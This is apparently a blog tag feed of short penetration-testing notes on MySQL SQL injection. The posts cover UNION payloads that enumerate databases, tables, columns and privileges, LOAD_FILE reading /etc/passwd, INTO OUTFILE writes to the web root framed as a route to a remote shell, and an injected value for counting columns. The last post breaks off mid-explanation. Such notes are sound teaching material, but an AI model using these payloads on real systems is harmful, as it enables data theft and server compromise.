https://slightlymore.co.uk/tags/sql-injection/Recent content in Sql-Injection on slightlymoreHugoen-GB<a href="https://creativecommons.org/licenses/by/4.0/" target="_blank" rel="license">CC BY 4.0</a> by Clinton MontagueSun, 04 Jan 2026 12:47:19 +0000https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection/Sat, 03 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection/<p>Using a UNION injection we can find out about a (MySQL/MariaDB) structure.</p> <p>Here are some minimal examples. Remember to <a href="https://slightlymore.co.uk/how-to-determine-the-number-of-columns-for-union-sql-injection">determine the correct number of columns 🌿</a> and match that. Also clearly remember to add <code>WHERE</code> clauses to these to narrow down the search.</p> <h2 id="databases">Databases</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">SCHEMA_NAME</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">SCHEMATA</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></div><h2 id="tables">Tables</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">TABLE_NAME</span><span class="p">,</span><span class="n">TABLE_SCHEMA</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">TABLES</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></div><h2 id="columns">Columns</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">COLUMN_NAME</span><span class="p">,</span><span class="k">TABLE_NAME</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">COLUMNS</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></div><h2 id="privileges">Privileges</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">GRANTEE</span><span class="p">,</span><span class="w"> </span><span class="n">PRIVILEGE_TYPE</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">USER_PRIVILEGES</span><span class="w"> </span></span></span></code></pre></div><h2 id="references">References</h2> <ul> <li><a href="https://slightlymore.co.uk/how-to-determine-the-number-of-columns-for-union-sql-injection">How to determine the number of columns for <code>union</code> SQL injection 🌿</a> </li> </ul>https://slightlymore.co.uk/reading-files-with-mysql/Sat, 03 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/reading-files-with-mysql/<p>After <a href="https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection">enumerating user privileges 🌿</a> if you find one which has <code>FILE</code> you can use that to read files from the target.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="s1">&#39;/etc/passwd&#39;</span><span class="p">)</span><span class="w"> </span></span></span></code></pre></div><h2 id="references">References</h2> <ul> <li><a href="https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection">Enumerating databases, tables, columns, and user privileges with SQL injection 🌿</a> </li> <li><a href="https://slightlymore.co.uk/writing-files-with-mysql">Writing files with MySQL 🌱</a> </li> </ul>https://slightlymore.co.uk/sql-injection-resources/Sat, 03 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/sql-injection-resources/<h2 id="tools">Tools</h2> <ul> <li><a href="https://sqlmap.org/" target="_blank" rel="noopener">sqlmap ↗️</a> has a <code>--proxy</code> flag</li> </ul> <p>Pro tip: remember to use <a href="https://slightlymore.co.uk/proxying-cli-traffic-to-burp-suite-using-proxychains">proxychains 🌿</a> to proxy to burp for tools without proxy flags!</p> <h2 id="techniques">Techniques</h2> <ul> <li><a href="https://slightlymore.co.uk/writing-files-with-mysql">Writing files with MySQL 🌱</a> </li> <li><a href="https://slightlymore.co.uk/reading-files-with-mysql">Reading files with MySQL 🌱</a> </li> <li><a href="https://slightlymore.co.uk/how-to-determine-the-number-of-columns-for-union-sql-injection">How to determine the number of columns for <code>union</code> SQL injection 🌿</a> </li> <li><a href="https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection">Enumerating database tables and columns with SQL injection 🌿</a> </li> </ul>https://slightlymore.co.uk/writing-files-with-mysql/Sat, 03 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/writing-files-with-mysql/<h2 id="prerequisites">Prerequisites</h2> <p>This should not be enabled on any modern secure systems, but if it is, you can use it to create a remote shell.</p> <p><a href="https://dev.mysql.com/doc/refman/8.4/en/server-system-variables.html#sysvar_secure_file_priv" target="_blank" rel="noopener"><code>secure_file_priv</code> ↗️</a> can have the following values:</p> <ul> <li><code>null</code>: cannot write anywhere on system</li> <li><code>&quot;&quot;</code> (empty string): can write anywhere</li> <li><code>&quot;/path/to/dir&quot;</code>: can write only to specified path</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">SHOW</span><span class="w"> </span><span class="n">VARIABLES</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;secure_file_priv&#39;</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></div><p>You can get this by querying the information_schema using a union injection</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">VARIABLE_NAME</span><span class="p">,</span><span class="n">VARIABLE_VALUE</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">GLOBAL_VARIABLES</span><span class="w"> </span></span></span></code></pre></div><h2 id="do-it">Do it</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">SELECT</span><span class="w"> </span><span class="s2">&#34;OOPS!&#34;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">OUTFILE</span><span class="w"> </span><span class="s2">&#34;/var/www/html/poc.txt&#34;</span><span class="w"> </span></span></span></code></pre></div><h2 id="references">References</h2> <ul> <li> <p><a href="https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection">Enumerating databases, tables, columns, and user privileges with SQL injection 🌿</a> </p>https://slightlymore.co.uk/how-to-determine-the-number-of-columns-for-union-sql-injection/Fri, 02 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/how-to-determine-the-number-of-columns-for-union-sql-injection/<p>A union injection causes additional rows to be added to the result set by using the <code>UNION</code> clause. To do this, we need to know the number of columns in the target result set.</p> <p>There are two easy strategies for this. Using <code>order by</code> or <code>union</code>. Assume that the following is vulnerable:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">username</span><span class="o">=</span><span class="s1">&#39;$oops&#39;</span><span class="w"> </span></span></span></code></pre></div><h2 id="order-by"><code>order by</code></h2> <p>In MySQL you can use numeric arguments for order by which you can use to infer the number of columns. Let <code>$oops = &quot;test' order by 1 -- </code> then the query becomes:</p>